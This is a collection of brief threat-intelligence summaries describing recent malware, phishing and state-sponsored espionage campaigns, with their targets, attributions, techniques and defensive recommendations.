Google Threat Intelligence Group has identified a new iOS full-chain exploit called DarkSword, which leverages multiple zero-day vulnerabilities to compromise devices running iOS 18.4 through 18.7. Since November 2025, multiple commercial surveillance vendors and suspected state-sponsored actors have been observed using DarkSword in campaigns targeting users in Saudi Arabia, Turkey, Malaysia, and Ukraine. The exploit chain utilizes six different vulnerabilities to deploy final-stage payloads, including three distinct malware families: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of DarkSword across various threat actors mirrors the previously discovered Coruna iOS exploit kit. Notable users include UNC6353, a suspected Russian espionage group, which has incorporated DarkSword into their watering hole campaigns targeting Ukrainian websites.

Zscaler ThreatLabz identified a new command-and-control framework implant called SnappyClient, delivered via HijackLoader. SnappyClient is a C++-based implant with data theft and remote access capabilities. It employs evasion techniques like AMSI bypass, Heaven's Gate, direct system calls, and transacted hollowing. The malware receives configuration files from its C2 server and uses a custom encrypted network protocol. SnappyClient's main functions include stealing browser data, taking screenshots, keylogging, and providing remote shell access. Analysis suggests potential ties to HijackLoader based on code similarities. The primary goal appears to be cryptocurrency theft, targeting wallet addresses and crypto-related applications.

This report details the discovery and analysis of a Horabot malware campaign targeting primarily Mexican users. The attack chain begins with a fake CAPTCHA page leading to multiple stages of obfuscated scripts, ultimately delivering an AutoIT loader and a Delphi-based banking Trojan. The malware employs sophisticated encryption techniques, anti-VM checks, and a custom protocol for C2 communication. It also includes a spreader component written in PowerShell that harvests and exfiltrates email addresses to distribute phishing emails. The analysis reveals Brazilian Portuguese comments in the code, suggesting the threat actor's origin. The report provides detection opportunities including YARA rules and hunting queries to identify this threat.

LeakNet, a ransomware operator, has expanded its initial access methods by utilizing ClickFix lures on compromised websites and implementing a new Deno-based, in-memory loader. The group has shifted from relying on initial access brokers to running its own campaigns. LeakNet's post-exploitation playbook remains consistent, involving jli.dll side-loading, PsExec-based lateral movement, and S3 bucket payload staging. The Deno loader executes base64-encoded payloads in memory, making detection challenging for traditional security tools. Defenders are advised to focus on behavioral signals and implement measures such as blocking newly registered domains, restricting Win-R access, and limiting PsExec usage to authorized administrators.

An exposed open directory revealed a comprehensive Roundcube exploitation toolkit used by APT28 to target Ukrainian government entities. The toolkit includes XSS payloads, a Flask-based C2 server, CSS injection tools, and a Go-based implant. It enables credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction. The primary target was identified as mail.dmsu.gov.ua, Ukraine's State Migration Service. Technical analysis shows significant overlaps with previously documented APT28 operations, while introducing new capabilities such as CSS-based side-channel attacks and browser credential theft. The toolkit's modular approach and sophisticated evasion techniques demonstrate APT28's evolving tactics in compromising webmail platforms for long-term intelligence gathering.

The Contagious Trader campaign is a sophisticated malware operation targeting cryptocurrency users, attributed to North Korea with high confidence. It involves malicious cryptocurrency trading bot projects on GitHub that exfiltrate sensitive data and private keys using various techniques, including malicious npm dependencies. The campaign demonstrates overlaps with known North Korean tactics, particularly those of FAMOUS CHOLLIMA, including the use of GitHub, npm, and Vercel infrastructure, Base64-encoded payload URLs, and anonymizing VPNs for npm package publishing. The operation represents a shift in tactics, expanding beyond the previous Contagious Interview campaign to target a broader range of cryptocurrency users.

The Konni Group conducted a sophisticated multi-stage attack campaign, initiating with a spear-phishing email disguised as a North Korean human rights lecturer appointment. The attack progressed through execution of a malicious LNK file, installation of remote access malware, and long-term persistence for data theft. A key feature was the unauthorized access to victims' KakaoTalk PC applications, used to distribute additional malicious files to selected contacts. The campaign employed multiple RAT families, including EndRAT, RftRAT, and RemcosRAT, with a distributed C2 infrastructure across Finland, Japan, and the Netherlands. The threat actor's tactics included trust-based propagation, account session abuse, and modular payload deployment, highlighting the need for advanced behavior-based detection and multi-layered defense strategies.

The article exposes a sophisticated scam targeting Minecraft players through fake 'grief-free' server communities. The SugarSMP website, promising a safe gaming experience, was found to distribute malware-infected mod packs. The malware, named Spark stealer, steals sensitive data including Discord tokens, browser credentials, and crypto wallet information. The threat actors employ social engineering tactics to maintain their fake community's reputation and remove warnings about their activities. Multiple similar websites were discovered, all hosting various types of malware. The scam's persistence mechanisms and social engineering techniques are detailed, along with remediation steps for affected users.

A sophisticated phishing campaign is targeting users of the newly-launched Pudgy World browser game, exploiting the game's requirement to connect cryptocurrency wallets. The fake site mimics the official game's appearance and wallet connection process, presenting convincing forgeries of 11 different wallet interfaces to steal credentials. The attack employs advanced evasion techniques to avoid detection by security researchers and sandboxes. It capitalizes on the excitement around the game's launch and users' unfamiliarity with Web3 onboarding processes. The campaign demonstrates a high level of technical sophistication, potentially indicating the use of a commercial phishing kit designed for crypto-related attacks.

A sophisticated phishing campaign targeting a Ukrainian government agency exploits a cross-site scripting vulnerability in Zimbra Collaboration Suite. The attack, attributed to a Russian APT group, uses a seemingly innocuous internship inquiry email to deliver a malicious JavaScript payload. When opened in a vulnerable Zimbra webmail session, the script silently executes, harvesting credentials, session tokens, 2FA codes, and mailbox contents. The multi-stage attack employs obfuscation techniques, SOAP API abuse, and dual-channel exfiltration via DNS and HTTPS. The campaign demonstrates the evolution of webmail-focused intrusions, relying on browser-resident stealers rather than traditional malware binaries.

An Iranian threat actor's operational infrastructure was exposed through an open directory, revealing a 15-node relay network spanning Finland and Iran, an SSH-based botnet framework, and an active command and control server. The exposed bash history documented the full operation, including tunnel deployment, DDoS tooling development, and botnet creation. The actor used on-host compilation to evade detection and leveraged a Python script for mass SSH deployment. The botnet client, compiled and renamed 'hex' on infected hosts, showed automatic reconnection capabilities. This operation appears to be financially or personally motivated rather than state-directed, with infrastructure dual-purposed for censorship bypass and attack operations.

Hydra Saiga, a suspected Kazakhstani state-sponsored threat actor, has been actively targeting government, energy, and critical infrastructure in Central Asia, Europe, and the Middle East since 2021. The group is known for using Telegram Bot API for C2 communication and employing a mix of custom implants and 'Living off the Land' techniques. Their activities align closely with Kazakhstan's geopolitical interests, particularly in water and energy sectors. The group has compromised at least 34 organizations across 8 countries, with reconnaissance extending to over 200 additional targets globally. Hydra Saiga's operations demonstrate a clear focus on water infrastructure linked to major regional rivers and gas distribution systems, reflecting strategic intelligence collection efforts.

A new campaign targeting Ukrainian entities has been identified, attributed to actors linked to Russia. The campaign uses judicial and charity-themed lures to deploy a JavaScript-based backdoor called DRILLAPP, which runs through the Edge browser. This backdoor enables various actions including file manipulation, microphone access, and webcam capture. Two variants of the campaign have been observed, with the second variant introducing additional capabilities. The attackers utilize the browser's capabilities to evade detection and gain access to sensitive resources. The campaign shares tactics with a previously reported Laundry Bear operation, leading to a low-confidence attribution to this group.

IBM X-Force discovered a likely AI-generated malware named 'Slopoly' used in a ransomware attack by the Hive0163 group. This marks the beginning of AI adoption among cybercrime groups, potentially transforming the threat landscape. Slopoly, while relatively unsophisticated, demonstrates how easily threat actors can use AI to develop new malware quickly. The attack involved ClickFix social engineering, NodeSnake malware, and InterlockRAT, culminating in the deployment of Interlock ransomware. This incident highlights the growing trend of AI-generated and AI-integrated malware, which could lead to more ephemeral and difficult-to-attribute attacks, challenging traditional threat intelligence methods.

ACRStealer, a sophisticated Malware as a Service, has evolved with enhanced evasion techniques and C2 communication strategies. It employs low-level syscalls and AFD for stealthy operations, bypassing user-mode hooks. The malware uses layered communication, establishing raw TCP connections followed by SSL/TLS over SSPI. ACRStealer's data-stealing capabilities are extensive, targeting browsers, Steam accounts, and performing victim fingerprinting. It can execute secondary payloads and capture screenshots. The malware shows an active infection pattern in countries like the USA, Mongolia, and Germany, communicating with specific IP addresses and domains. Recent developments indicate a shift to LummaStealer, suggesting ongoing threat actor activities targeting gaming platforms and social media.

The Iranian threat group Boggy Serpens, linked to the Ministry of Intelligence and Security, has refined its cyberespionage tactics to focus on trusted relationship compromises and multi-wave targeting of strategic organizations. The group combines social engineering with AI-enhanced malware for long-term persistence, primarily targeting diplomatic and critical infrastructure sectors. Recent campaigns show increased technological capabilities, including AI-generated code and Rust-based tools. Boggy Serpens exploits hijacked accounts to bypass security measures and employs a secondary social engineering prompt to deliver malware. The group's determination is exemplified by a sustained four-wave campaign against a UAE marine and energy company, demonstrating its focus on infiltrating regional maritime infrastructure.

A recent cybercrime campaign uses compromised WordPress websites to distribute the Vidar infostealer malware to Windows users. The attack employs fake CAPTCHA pages that trick victims into running malicious commands. The infection chain involves an HTA script, which downloads and executes a malicious MSI installer. This installer then deploys a GoLang loader that ultimately decrypts and loads the Vidar infostealer into memory. The campaign targets users in multiple countries, including Italy, France, the United States, the United Kingdom, and Brazil. The attackers inject malicious code into WordPress sites, which filters visitors and displays the fake CAPTCHA page to Windows desktop users.

The intelligence details indicators of compromise for the Coruna iOS iPhone web malware exploitation kit. It provides MD5, SHA-1, and SHA-256 hashes for detected JavaScript payloads. The analysis lists numerous active domains serving the malware, including specific URLs delivering client-side exploits. The campaign involves a wide network of malicious domains and URLs targeting iOS devices. The extensive list of compromised and malicious infrastructure demonstrates the scale of this exploitation kit's operations, highlighting the ongoing threat to iPhone users through web-based attacks.

A sophisticated multi-stage infection chain targets Argentina's judicial ecosystem using spear-phishing tactics and authentic-looking judicial content. The campaign employs a carefully crafted ZIP archive containing a weaponized LNK shortcut, BAT-based loader script, and judicial-themed PDF decoy. The attack chain leads to the deployment of a Rust-based Remote Access Trojan (RAT) that demonstrates extensive anti-VM, anti-sandbox, and anti-debugging techniques. The RAT establishes a resilient command-and-control channel, supports modular commands for various malicious activities, and implements full lifecycle management. The operation, dubbed 'Operation Covert Access,' aims to secure long-term access within high-trust institutional settings, highlighting the need for improved defenses against socially engineered intrusion chains.

GoPix is an advanced persistent threat targeting Brazilian financial institutions and cryptocurrency users. It uses memory-only implants and obfuscated PowerShell scripts, evolving from previous RAT and ATS threats. The malware employs sophisticated techniques, including malvertising via Google Ads, man-in-the-middle attacks, and monitoring of Pix transactions and Boleto slips. GoPix bypasses security measures, maintains persistence, and uses robust cleanup mechanisms. It leverages multiple obfuscation layers and a stolen code signing certificate to evade detection. The threat actors carefully select victims, including financial bodies of state governments and large corporations, using legitimate anti-fraud services for targeted delivery.

The Warlock ransomware group has enhanced its attack chain with improved methods for persistence, lateral movement, and evasion. Their updated toolset includes TightVNC, Yuze, and a persistent BYOVD technique exploiting the NSec driver. The group's primary targets were technology, manufacturing, and government sectors, with the US, Germany, and Russia being the most affected countries. Warlock continues to exploit unpatched Microsoft SharePoint servers for initial access, and has expanded its post-exploitation toolkit. New additions include TightVNC for persistent remote access, Yuze for establishing SOCKS5 connections, and a BYOVD technique using the NSecKrnl.sys driver to terminate security products. The group also leverages Velociraptor, VS Code tunnels, and Cloudflare Tunnel for C&C communications.

A sophisticated keylogger campaign has been discovered, utilizing spear-phishing emails with attachments containing hidden malware. The campaign targets multiple countries, employing various packaging styles and execution methods. The malware, known as VIP_Keylogger, is delivered using steganography and process hollowing techniques. It focuses on stealing sensitive information from browsers, email clients, and other applications. The keylogger captures browser data, decrypts passwords, and exfiltrates information through multiple channels, including email. While some features appear disabled, the malware demonstrates advanced capabilities in data theft and evasion techniques.

A new variant of the ClickFix technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. This acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods and utilizes Electron application bundling to hide malicious code.

Operation CamelClone is a multi-region espionage campaign targeting government and defense entities in Algeria, Mongolia, Ukraine, and Kuwait. The attackers use spear-phishing emails with malicious ZIP archives containing lure documents and shortcuts. The infection chain involves a JavaScript loader called HOPPINGANT, which downloads additional payloads from public file-sharing websites. The campaign abuses legitimate tools like Rclone for data exfiltration to MEGA cloud storage. Targeting patterns suggest intelligence gathering objectives, focusing on foreign policy, defense capabilities, and diplomatic alignments of countries navigating major-power rivalries. The operation's use of public services for payload hosting and data exfiltration makes network-based detection challenging.

A China-nexus threat actor targeted countries in the Persian Gulf region using a multi-stage attack chain to deploy a PlugX backdoor variant. The campaign exploited the renewed Middle East conflict, using an Arabic-language document lure depicting missile attacks. The attack utilized a ZIP archive containing a malicious Windows shortcut file, which downloaded a CHM file leading to the deployment of PlugX. The malware employed various obfuscation techniques, including control flow flattening and mixed boolean arithmetic. The PlugX variant supported HTTPS for command-and-control communication and DNS-over-HTTPS for domain resolution. Based on the tools and tactics used, the activity is attributed to a China-nexus actor, possibly linked to Mustang Panda.

A credential theft campaign by Storm-2561 exploits SEO poisoning to distribute fake VPN clients. Users searching for legitimate VPN software are redirected to malicious websites hosting ZIP files containing trojans masquerading as trusted VPN clients. These digitally signed trojans harvest VPN credentials and exfiltrate data to attacker-controlled infrastructure. The campaign uses GitHub repositories, legitimate code-signing certificates, and sophisticated post-theft redirection strategies to avoid detection. The attack chain involves initial access through SEO manipulation, execution of malicious MSI files, credential theft via fake VPN interfaces, and data exfiltration. Defensive recommendations include enabling cloud-delivered protection, using EDR in block mode, and enforcing multi-factor authentication.

A suspected Chinese state-sponsored espionage campaign targeting Southeast Asian military organizations has been identified, traced back to at least 2020. Designated as CL-STA-1087, the operation demonstrates strategic patience and focused intelligence collection on military capabilities and structures. The attackers deployed custom tools including the AppleChris and MemFun backdoors, and a modified Mimikatz variant called Getpass. The campaign is characterized by the use of dead drop resolvers, custom HTTP verbs, and anti-forensic techniques. Infrastructure analysis reveals long-term persistence and operational compartmentalization. The activity aligns with Chinese working hours and utilizes China-based cloud infrastructure, suggesting a Chinese nexus.

Handala Hack, an online persona operated by Void Manticore, is affiliated with Iranian intelligence services. The group, known for destructive wiping attacks and hack-and-leak operations, has targeted organizations in Israel, Albania, and the US. Their tactics include supply chain attacks, credential theft, and manual intrusions. The group deploys multiple wiping methods simultaneously, including custom malware, PowerShell scripts, and disk encryption. Recent activities show expanded targeting and some new techniques, such as using NetBird for tunneling and AI-assisted wiping scripts. Despite some operational security lapses, Handala continues to pose a significant threat, primarily through hands-on, opportunistic attacks.

A recurring phishing scheme impersonates United Healthcare, offering a free Oral-B toothbrush as bait. The scammers have evolved their tactics, now using IPv6-mapped IPv4 addresses to obfuscate links in emails. This technique makes the IP addresses appear confusing while remaining valid and routable. The phishing emails direct victims to fast-rotating landing pages, likely aiming to collect personal information and card data under the guise of confirming eligibility or paying for shipping. The article provides technical details on how the IPv6 trick works and offers advice on staying safe, including steps to take if personal information has been compromised.

A widespread SMS pumping campaign has been identified, targeting customer sign-up pages. The attackers, designated as O-UNC-036, use disposable email infrastructure and proxy services to launch high-volume, automated attacks against public API endpoints. Their objective is to create numerous accounts and trigger SMS messages to actor-controlled phone numbers, generating significant financial costs for target organizations. The attack pattern involves reconnaissance, infrastructure setup, and high-volume requests using known high-cost phone country codes. The campaign has been active since at least March 2024, affecting multiple tenants and organizations. Recommended protective measures include implementing FIDO Authentication, blocking suspicious domains and ASNs, and enhancing monitoring and response capabilities.

Huntress SOC analysts have uncovered sophisticated data exfiltration techniques employed by threat actors. The analysis reveals the use of various tools for data staging, including WinZip, 7Zip, and Windows' native tar.exe. Exfiltration methods observed include the use of finger.exe and backup utilities like restic, BackBlaze, and s5cmd. A specific incident on February 25, 2026, involved INC ransomware deployment, with the threat actor using PSEXEC for privilege escalation and creating a scheduled task to run a malicious PowerShell script. The actor utilized the Restic backup utility, renamed as winupdate.exe, to exfiltrate data. Similar tactics were observed in a previous incident on February 9, suggesting a pattern in the threat actor's methodology.

The RondoDox botnet has emerged as a significant threat, exploiting 174 different vulnerabilities since May 2025. It primarily targets IoT devices and internet-exposed services for DoS attacks. The botnet's infrastructure includes exploiting and hosting components, with evidence suggesting the use of compromised residential IPs. RondoDox's operators have shown a rapid adoption of newly disclosed vulnerabilities, sometimes exploiting them within days of publication. The botnet's evolution includes a shift from a shotgun approach using numerous exploits to a more focused strategy targeting recent, critical vulnerabilities. The malware shares similarities with Mirai but focuses solely on DoS attacks. This threat highlights the importance of exposure management in cybersecurity.

The ongoing conflict involving Iran has led to increased cyber espionage activities targeting Middle Eastern governments. Multiple state-sponsored threat actors, including those from China, Belarus, Pakistan, and Hamas, have been observed conducting campaigns using the conflict as a lure. These actors are employing various tactics such as credential phishing, malware delivery, and compromised accounts to target government and diplomatic organizations. The campaigns often use war-themed content to engage targets and gather intelligence on the conflict's trajectory and geopolitical implications. Iranian threat actors continue their traditional espionage efforts alongside disruptive campaigns in support of war efforts. This heightened activity reflects both opportunistic use of topical lures and shifts in intelligence collection priorities for various state-aligned groups.

The ongoing Middle East crisis has given rise to opportunistic online fraudulent activities. Two main strands have been observed: confirmed government-impersonation fraud and suspicious evacuation-themed websites. Fraudsters are exploiting the confusion and urgency surrounding the crisis to launch phishing campaigns and create deceptive websites. A notable example includes an email impersonating UAE authorities, urging recipients to complete a mandatory emergency registration form. Additionally, several newly registered websites offering evacuation services from Dubai and the Gulf region have emerged, displaying characteristics commonly associated with scams. These sites use crisis-related domain names, employ urgent messaging, lack verifiable operator details, and often request unconventional payment methods. The situation highlights the need for increased vigilance and proactive monitoring of emerging digital threats during geopolitical crises.

A sophisticated infection chain has been discovered that installs CastleRAT malware without leaving traces on disk. The attack uniquely abuses the Deno runtime as a malicious framework, combining social engineering, steganography, and in-memory execution to evade detection. The process involves tricking users into executing a command, installing Deno, running obfuscated JavaScript, and decoding a payload hidden in a JPEG image. CastleRAT then gains total control, performing host fingerprinting, keylogging, clipboard hijacking, digital identity theft, and audio/video surveillance. This campaign demonstrates the evolution of malware towards invisibility and the need for advanced endpoint behavioral monitoring to detect such threats.

SentinelOne's DFIR team has responded to multiple incidents involving compromised FortiGate NGFW appliances used to establish footholds in targeted environments. Attackers exploited vulnerabilities or weak credentials to access FortiGate devices, extract configuration files containing service account credentials, and use those to join rogue workstations to Active Directory. In one case, the attacker used the access to deploy remote management tools and steal the NTDS.dit file. The incidents highlight the need for strong access controls, patching, and improved logging on edge devices. Organizations are advised to implement SIEM solutions to detect anomalous activity and automate responses.

A sophisticated new malware called KadNap has been discovered targeting Asus routers and conscripting them into a botnet for proxying malicious traffic. The malware employs a custom version of the Kademlia Distributed Hash Table protocol to conceal its command-and-control infrastructure within a peer-to-peer system, evading traditional network monitoring. The botnet, which has grown to over 14,000 infected devices, is marketed by a proxy service called Doppelganger, tailored for criminal activity. More than 60% of KadNap's victims are based in the United States. The malware demonstrates versatility by targeting various edge networking devices and employing different C2 servers for different victim types.

A new phishing technique abusing Microsoft's OAuth Device Code flow is on the rise, with over 180 phishing URLs detected in a week. This method shifts from credential theft to token-based account takeover, making detection more challenging. Attackers initiate a device authorization process, tricking victims into approving it on legitimate Microsoft pages. The attack uses encrypted HTTPS traffic and legitimate authentication flows, bypassing traditional phishing indicators. Victims unknowingly grant attackers access to their Microsoft 365 accounts through OAuth tokens. This poses a critical risk as it allows immediate access to corporate data and resources, potentially leading to business email compromise and persistent access through refresh tokens.

Iranian intelligence services are increasingly engaging with the cyber crime ecosystem, leveraging criminal tools, services, and operational models to support state objectives. This trend is particularly evident among actors linked to the Ministry of Intelligence and Security (MOIS), such as Void Manticore and MuddyWater. These actors are not merely imitating criminal behavior but actively associating with the cyber criminal ecosystem, using its infrastructure, malware, and affiliate-style relationships. This approach enhances their operational capabilities, complicates attribution, and contributes to confusion around Iranian threat activity. Examples include the use of ransomware branding, commercial infostealers, and overlaps with criminal malware clusters. This shift from imitation to active engagement with cyber crime offers both improved deniability and expanded technical capabilities for Iranian actors.

Users are being tricked into enabling unwanted browser notifications through quiz websites. These sites challenge visitors with quizzes on various topics, but their main goal is to get users to click 'Start the quiz' button. This action triggers a misleading prompt that tricks users into allowing notifications. Once enabled, these notifications can display advertisements, scams, or unwanted downloads even when the user is not on the original website. The article provides instructions on how to remove and block web push notifications across different browsers, including Chrome, Firefox, Opera, Edge, and Safari. It also lists several domains associated with this deceptive campaign.

BeatBanker is a sophisticated Android malware campaign targeting Brazil. It spreads through phishing attacks using a fake Google Play Store website. The malware combines a cryptocurrency miner and a banking Trojan capable of hijacking devices and overlaying screens. It employs creative persistence mechanisms, including playing an inaudible audio loop. BeatBanker monitors device status, disguises itself as legitimate apps, and targets cryptocurrency transactions on Binance and Trust Wallet. Recent variants have replaced the banking module with the BTMOB remote administration tool, expanding its capabilities. The threat demonstrates advanced evasion techniques, uses Firebase Cloud Messaging for command and control, and targets multiple browsers for data collection. Victims are primarily located in Brazil, with some samples spreading via WhatsApp.

A deceptive website impersonating CleanMyMac tricks users into installing SHub Stealer, a sophisticated macOS malware. The malware steals sensitive data, including passwords, browser data, cryptocurrency wallets, and Telegram sessions. It can also modify wallet apps to steal recovery phrases. The attack begins with users pasting a command into Terminal, which downloads and executes a malicious script. The malware performs extensive data collection from various browsers and wallet applications, and installs persistent backdoors in certain crypto wallet apps. SHub Stealer is part of a growing family of AppleScript-based macOS infostealers, demonstrating increasing sophistication in targeting Mac users.

A new attack technique called InstallFix targets users by cloning popular developer tool installation pages and presenting malicious install commands. Attackers distribute these fake pages through Google Ads, exploiting users' trust in familiar 'curl to bash' installation methods. The campaign specifically targets Claude Code users, delivering the Amatera Stealer malware. This technique bypasses email security controls and exploits the growing trend of non-technical users adopting developer tools. The attack leverages legitimate hosting services and is part of a broader trend targeting AI-related tools. The payload uses staged execution and various evasion techniques to avoid detection.

A new backdoor, dubbed A0Backdoor, has been discovered in connection with a campaign using email bombing and IT-support impersonation over Microsoft Teams to gain Quick Assist access. The malware's loader exhibits anti-sandbox evasion techniques, and the campaign's command-and-control has shifted to a covert DNS mail exchange-based channel. This activity is attributed to the threat group Blitz Brigantine, also known as Storm-1811 or STAC5777, and shows similarities to Black Basta-linked social-engineering tactics. The attackers use digitally signed MSI packages, often hosted on Microsoft cloud storage, to deliver their proprietary tooling. The A0Backdoor employs sophisticated techniques such as time-based execution windows, runtime decryption, and DNS tunneling for covert communication. The campaign has been active since August 2025, targeting primarily the finance and health sectors.

An intrusion attributed to MuddyWater, an Iranian-linked APT, was identified in a customer environment. The attack involved initial access through RDP, establishing an SSH tunnel, and deploying malware via DLL side-loading. The threat actor used FMAPP.exe, a legitimate Fortemedia Inc. application, to load a malicious FMAPP.dll for C2 communications. The timeline of activities revealed typos in commands, suggesting manual typing by the attacker. The intrusion included reconnaissance efforts, attempts to verify tunnel functionality, and issues with initial C2 communication. The attack targeted an Israeli company, aligning with known MuddyWater tactics.

The ongoing conflict in the Middle East has triggered a surge in cybercriminal activity. Over 8,000 newly registered domains with conflict-related keywords have been identified, many of which may be weaponized in future campaigns. Multiple cases of malicious activity have been observed, including targeted attacks using conflict-themed lures, deployment of the LOTUSLITE backdoor, fake news blogs leading to StealC malware, phishing sites impersonating government portals, donation scams, fraudulent storefronts, and meme-coin pump-and-dump schemes. Threat actors are leveraging various techniques such as DLL sideloading, shellcode execution, and social engineering to compromise victims. The campaigns demonstrate the opportunistic nature of cybercriminals in exploiting geopolitical events for malicious purposes.

A campaign using fake Zoom and Google Meet pages to lure victims into fraudulent video calls has been identified. The attackers use these pages to deliver remote-access software. Multiple domains hosting identical fake meeting pages were discovered, with one domain previously linked to a ClickFix campaign. The fake interfaces show an active meeting with expected participants. When victims join, they are prompted to download a file disguised as a Zoom update. Various payloads were identified, including executables masquerading as meeting updates, MSI installers deploying legitimate remote support software, and commercial monitoring software configured for covert remote access. The campaign's goal appears to be establishing remote access using whichever tool is most effective.

A targeted campaign has been identified distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications. The malicious app retains full rocket alert functionality while running malicious code in the background. It bypasses Android security checks through certificate spoofing and runtime manipulation. Once installed, the malware collects sensitive data including SMS messages, contacts, location data, device accounts, and installed applications. The stolen data is transmitted to a remote command-and-control server. This campaign exploits user trust in emergency services during periods of geopolitical tension, combining social engineering with mobile espionage for maximum impact.

Since 2020, a Chinese threat actor dubbed CL-UNK-1068 has been targeting high-value organizations across South, Southeast and East Asia, focusing on critical sectors like aviation, energy, government, and telecommunications. The group employs a diverse toolkit including custom malware, modified open-source utilities, and living-off-the-land binaries to maintain stealthy persistence. Their techniques involve web shell deployment, DLL side-loading attacks, and credential theft. The attackers exfiltrate sensitive data, including configuration files and database backups. While primarily assessed as an espionage operation, cybercriminal motivations cannot be fully ruled out. The activity demonstrates sophisticated cross-platform capabilities, targeting both Windows and Linux environments.

An investigation has uncovered malicious Chromium-based browser extensions masquerading as legitimate AI assistant tools to collect Large Language Model (LLM) chat histories and browsing data. These extensions have been installed approximately 900,000 times, affecting over 20,000 enterprise tenants. The malicious extensions collect full URLs and AI chat content from platforms like ChatGPT and DeepSeek, potentially exposing organizations to leaks of confidential information. The attack chain involves reconnaissance, weaponization, delivery through trusted app stores, exploitation of user trust, installation for persistence, and regular data exfiltration to attacker-controlled infrastructure. This activity transforms a seemingly benign productivity tool into a persistent data collection mechanism embedded in daily enterprise browser usage.

UAT-9244, a China-nexus advanced persistent threat actor, has been targeting critical telecommunications infrastructure in South America since 2024. The group employs three new malware implants: TernDoor, a Windows-based backdoor variant of CrowDoor; PeerTime, an ELF-based backdoor using BitTorrent protocol; and BruteEntry, a brute force scanner for SSH, Postgres, and Tomcat servers. UAT-9244 uses dynamic-link library side-loading, scheduled tasks, and registry modifications for persistence. The group is closely associated with FamousSparrow and Tropic Trooper, sharing similar tooling and tactics. Their infrastructure includes multiple command and control servers and operational relay boxes for scanning and brute-forcing activities.

Iranian APT group Seedworm has been active on networks of multiple U.S. companies since February 2026, targeting a bank, airport, software company, and NGOs. The group deployed new backdoors named Dindoor and Fakeset, signed with certificates previously linked to Seedworm. The activity occurs amid escalating tensions between the U.S., Israel, and Iran. Seedworm, known for espionage and information gathering, has broadened its scope to target various sectors globally. The article discusses recent Iranian cyber activities, potential future threats, and provides recommendations for defenders to prepare against DDoS, credential attacks, leaks, critical infrastructure attacks, and destructive operations.

Researchers identified and analyzed exposed infrastructure of MuddyWater, an Iranian cyber espionage group linked to the Ministry of Intelligence and Security. The investigation revealed their reconnaissance methods, exploitation of vulnerabilities, custom command and control frameworks, and exfiltration techniques. Targets included organizations in Israel, Jordan, Egypt, UAE, Portugal, and the US. Notable findings include the use of Ethereum smart contracts for C2 communication, multiple custom C2 frameworks, and exploitation of various CVEs. The group showed a pattern of rapid adoption of public exploits and development of custom tools, while also exhibiting operational security failures that enabled this research.

A sophisticated cyber attack campaign combines social engineering and advanced malware techniques. Attackers pose as IT support to gain initial access, then deploy a modified version of the Havoc C2 framework. The malware uses DLL sideloading, indirect syscalls, and custom loaders to evade detection. After compromising the initial system, the attackers rapidly move laterally, establishing persistence through scheduled tasks and legitimate remote monitoring tools. The campaign demonstrates a blend of human-centric initial access methods and advanced technical evasion techniques, highlighting the need for comprehensive security measures spanning user awareness and technical controls.

Tycoon2FA emerged as a prominent phishing-as-a-service platform in August 2023, enabling large-scale campaigns targeting over 500,000 organizations monthly. Developed by Storm-1747, it provided adversary-in-the-middle capabilities to bypass multifactor authentication. The kit allowed impersonation of trusted brands like Microsoft 365 and Gmail, intercepting session cookies and credentials. It employed sophisticated evasion techniques including anti-bot screening, browser fingerprinting, and custom CAPTCHAs. Tycoon2FA's infrastructure evolved to use diverse, short-lived domains and complex redirect chains. Its success stemmed from closely mimicking legitimate authentication processes while covertly intercepting user credentials and session tokens.

The analysis examines Iranian state-aligned threat actors and their infrastructure patterns during heightened geopolitical tensions. It focuses on mapping network infrastructure, ASN patterns, TLS fingerprints, and hosting clusters associated with various Iranian APT groups. The report highlights the importance of proactive infrastructure monitoring to detect and disrupt potential cyber operations. Key findings include the identification of previously unreported hosts, domains, and servers linked to Iranian operations, as well as insights into the tactics used by groups like MuddyWater and Dark Scepter. The article emphasizes the value of infrastructure intelligence in early threat detection and provides recommendations for organizations to monitor and defend against these threats.

Researchers at Infoblox have developed an advanced technique leveraging graph theory and SSL certificates to uncover threat actor operational relationships. The approach analyzes Certificate Transparency logs, using the Subject Alternative Name field in certificates to identify domains under common control. By modeling domains as nodes and certificate relationships as edges, the system reveals comprehensive threat infrastructures. This method enables discovery of new malicious domains, consolidation of threat actor identities, and early detection of emerging threats. The system processes millions of certificates daily, providing actionable intelligence on threat actor operations across various types of cybercriminal activities.

The report analyzes the cyber aspects of the ongoing conflict between Iran, the US, and Israel. It details a massive cyberattack launched by the US and Israel against Iran, causing widespread internet disruptions and infrastructure failures. The report also covers the activation and retooling of Iranian APT groups for retaliatory operations, targeting critical infrastructure in the US, Israel, and allied countries. Key actors include MuddyWater, Charming Kitten, OilRig, and Elfin. The analysis covers tactics, techniques, and procedures used by these groups, as well as their strategic objectives. The report also discusses the involvement of hacktivist proxies and the victimology of the attacks, affecting multiple countries and industries.

A remote access trojan (RAT) has been discovered in multiple Packagist packages published by the threat actor nhattuanbl. The malicious packages, disguised as Laravel utilities, install an encrypted PHP RAT via Composer dependencies. The payload connects to a C2 server, sends system reconnaissance data, and awaits commands, granting full remote access to the host. The RAT uses obfuscation techniques to resist analysis and employs a self-launch mechanism. It communicates with the C2 server using encrypted JSON messages and supports various commands for system control and data exfiltration. The attack vector leverages dependency chains, with clean-looking packages pulling in malicious ones. Affected systems should be treated as compromised, with recommendations provided for mitigation and prevention.

Multiple phishing campaigns were identified using workplace meeting lures, PDF attachments, and abuse of legitimate binaries to deliver signed malware. The attacks used digitally signed executables masquerading as legitimate software to install remote monitoring and management (RMM) tools like ScreenConnect, Tactical RMM, and Mesh Agent. These tools enabled attackers to establish persistence and move laterally within compromised environments. The malware was signed using an Extended Validation certificate issued to TrustConnect Software PTY LTD. The campaigns demonstrate how familiar branding and trusted digital signatures can be exploited to bypass user suspicion and gain an initial foothold in enterprise networks.

